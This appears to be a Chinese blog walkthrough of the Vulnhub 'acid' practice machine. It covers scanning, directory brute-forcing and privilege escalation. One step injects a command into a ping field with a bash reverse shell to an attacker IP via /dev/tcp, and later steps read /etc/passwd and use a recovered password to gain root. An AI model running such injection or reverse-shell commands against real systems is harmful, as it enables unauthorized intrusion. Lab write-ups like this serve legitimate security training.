Vulnhub靶场第四关

Vulnhub靶场 acid

目标:
获得root权限和flag
运行环境:
靶机配置:该虚拟机完全基于Web,提取rar并使用VMplayer运行vmx,网络连接方式设置为net,靶机自动获取IP。
攻击机配置:同网段下有Windows攻击机,安装有Burpsuit、nc、Python2.7、DirBuster、御剑等渗透工具。
1.使用nmap扫描VMware Network Adapter VMnet8 网段
2.获得ip进入主页
Vulnhub靶场第四关_第1张图片

3.并且发现端口:Tcp 33447
4.底层服务:Apache2.4.10
5.操作系统:Ubuntu
6.在查看源代码并且解码后得到
Vulnhub靶场第四关_第2张图片
7.http://192.168.238.136:33447/images/wow.jpg 猜测图片文件夹为images
Vulnhub靶场第四关_第3张图片
8.将图片保存并且用notepad++打开发现了一串加密代码

Vulnhub靶场第四关_第4张图片

9.发现是ascll 码,解密后发现为md5再次解密发现了一串数字 63425
Vulnhub靶场第四关_第5张图片
10.通过Dirbuster进行目录爆破最终找到了可以执行命令的目录
Vulnhub靶场第四关_第6张图片
11.通过burp进行抓包然后发送到重发模块重发,并且开启nc 监听端口 nc -lvn 4444
在post gat 下payload 需要进行url编码.
127.0.0.1&&echo “bash -i >& /dev/tcp/192.168.238.1/4444 0>&1” | bash
编码后重发得到shell
Vulnhub靶场第四关_第7张图片
12.输入 python -c ‘import pty;pty.spawn("/bin/bash")’
得到一个交互式的shell
在这里插入图片描述
13.查看有哪些的用户 cat /etc/passwd
Vulnhub靶场第四关_第8张图片
14.一般查看 id 大于1000的
15.find / -user acid 2>/dev/null 查找用户文件
16.发现一个流量包/sbin/raw_vs_isi/hint.pcapng
17.于是通关python搭建临时服务器命令:
cd /sbin/raw_vs_isi
python -m SimpleHTTPServer 8888
Vulnhub靶场第四关_第9张图片
18.浏览器192.168.238.136:8888 将流量包下载到本地并且用
Wireshark打开查找密码
在这里插入图片描述
19.su -saman 切换并输入密码:1337hax0r
20.sudo -i 尝试提权并查找flag.txt
Vulnhub靶场第四关_第10张图片

你可能感兴趣的:(Vulnhub靶场第四关,安全)